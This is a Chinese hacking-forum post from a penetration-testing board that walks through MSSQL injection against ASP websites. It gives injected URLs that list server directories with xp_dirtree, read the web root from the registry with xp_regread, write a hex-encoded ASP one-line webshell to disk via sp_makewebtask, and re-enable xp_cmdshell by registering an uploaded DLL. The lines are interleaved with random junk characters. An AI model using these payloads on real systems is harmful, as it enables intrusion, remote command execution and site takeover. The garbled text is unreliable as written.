找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MSsqlL注入取得网站路径最好的方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2152|回复: 0
打印 上一主题 下一主题

MSsqlL注入取得网站路径最好的方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:20:30 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
好,我们exec master..xp_dirtree'd:/test') c% M) M: ~% d# f
假设我们在test里有两个文件夹test1和test2在test1里又有test3. f% y" O8 ?; I3 A5 {4 E( o/ c
结果显示) c9 }! C* k0 P8 S
, p3 T/ z" _* K4 R
subdirectory depth
2 ]: G& x* N. ctest1 1
) `0 k* g+ e6 `) ^# c5 Vtest3 2
; ^" y( x- e# L$ F" G& `test2 16 K' L% G, e4 K1 \, }9 K8 @  \! }  {

! M* [. K1 S; [- @哈哈发现没有那个depth就是目录的级数
0 k0 V" {6 F, {0 dok了,知道怎么办了吧- K4 N: w( z: r- `* |* H9 U0 n9 a& B
7 C9 ^9 _) v9 s* j7 t
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- 4 @- L) U# ?0 A. d
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
7 U6 t# f& r! }% H* G/ x2 uhttp://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
8 U. ~, i# H5 h- M5 n% P0 N3 Y. p
只要加上id=1,就是第一级目录 。
& H) P" u( x1 o$ }" x) `: Q% Y  |* w+ K* m( H  c8 |' W

' s4 r( Y! z/ ?7 |: p% q! N8 j通过注册表读网站路径:
0 h( x  g7 a! J, v/ H7 \" m: A9 s( e! j8 l
1.;create table [dbo].[cyfd] ([gyfd][char](255));" C, U; \8 U( u5 p% v: [* i

  ~$ Y7 G" q( k% z! S2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--0 m' w2 l, Y- M# @1 E! C
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--8 R. t. b. j5 u8 l: v0 g, y# F; j
& i$ E8 v9 g( ?& ~$ w
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
3 h' P7 {7 L2 [: Tand 1=(select count(*) from cyfd where gyfd > 1) / p: J3 i/ T* E5 B# {' S. Q6 `0 h
这样IE报错,就把刚才插进去的Web路径的值报出来了* A8 l9 i  n$ c  @' ]: j

' X8 [# X7 w0 t; L1 s9 Z( @4.drop table cyfd;-- 删除临时表- M, d3 w. _; B# M- R1 _2 Y
+ r% |4 g' |3 E1 o- E) [; H
获得webshell方法:* s9 m' ]" A& B! y3 |
1.create table cmd (a image)-- \**cmd是创建的临时表
, @8 f# U+ [. o3 V( y  Y2 e
- g8 t  w% N( m# P5 U2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
; i8 X6 L; l! m' y2 c0 l! r( W3 z2 \  D" z
0 I9 Z: V! Y% b
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
1 b6 k7 H4 l& H( f# W& nEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
* w. n  W8 B6 ]: P; V- L
. Q1 K6 V! y8 v7 m/ @% f" p7 d4.drop table cmd;-- 删除cmd临时表3 W7 w, h9 u  v4 C, R( r( G) R! _! y  T

' B" c! I5 J" h4 z' s0 Q4 Q恢复xp_cmdshell方法之一:
  J' P+ U5 h7 u7 F: B: r  i我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:1 `) D0 i8 k' @3 W$ e' {1 a7 L/ ~
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'5 V/ R" t0 m0 U/ v' X0 n
恢复,支持绝对路径的恢复哦。:)
" Z# q( K& o+ F8 A! O2 g
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表